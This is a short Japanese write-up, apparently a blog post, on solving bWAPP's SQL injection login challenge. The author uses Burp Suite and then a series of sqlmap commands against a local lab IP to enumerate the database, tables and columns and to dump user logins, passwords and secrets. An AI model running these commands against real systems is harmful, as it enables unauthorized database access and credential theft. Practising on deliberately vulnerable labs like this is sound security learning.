Hello there,
A1 ⇨ SQL Injection(Login Form/User)を選択して。
いつものインジェクションを試してみると。
うまくいかず。
もう一発、インジェクションを試すと。
システムエラーが表示され、MySQLを使用していると。
とりあえず、適当にLoginとPasswordを入力して。
Burp Suiteで、パラメータを抜き取って。
別途、Kali linuxを起動して。
下記のようにsqlmapで調べることに。
※ここでbWAPPのURLは、『locahost』でなく実際のIPアドレスに変更しておくこと。
sqlmap -u "http://172.17.0.2/sqli_16.php" --cookie="security_level=0; PHPSESSID=ro7rd16pkig4tho1igrjabgor6" --data "login=neo&password=pass&form=submit" --dbs
データベース名がわかったので、次はテーブルを。
sqlmap -u "http://172.17.0.2/sqli_16.php" --cookie="security_level=0; PHPSESSID=ro7rd16pkig4tho1igrjabgor6" --data "login=neo&password=pass&form=submit" -D bWAPP --tables
次にテーブル内のカラムを。
sqlmap -u "http://172.17.0.2/sqli_16.php" --cookie="security_level=0; PHPSESSID=ro7rd16pkig4tho1igrjabgor6" --data "login=neo&password=pass&form=submit" -D bWAPP -T users --columns
最後に格納されているデータをダンプして。
これで、LoginとPasswordがわかった。
sqlmap -u "http://172.17.0.2/sqli_16.php" --cookie="security_level=0; PHPSESSID=ro7rd16pkig4tho1igrjabgor6" --data "login=neo&password=pass&form=submit" -D bWAPP -T users -C login,password,secret --dump
sqlmapをじっくりと勉強したわけでなく。
数をこなすことで、少しずつ抵抗もなくなり使い方の手順もわかってくるかと。
Best regards,
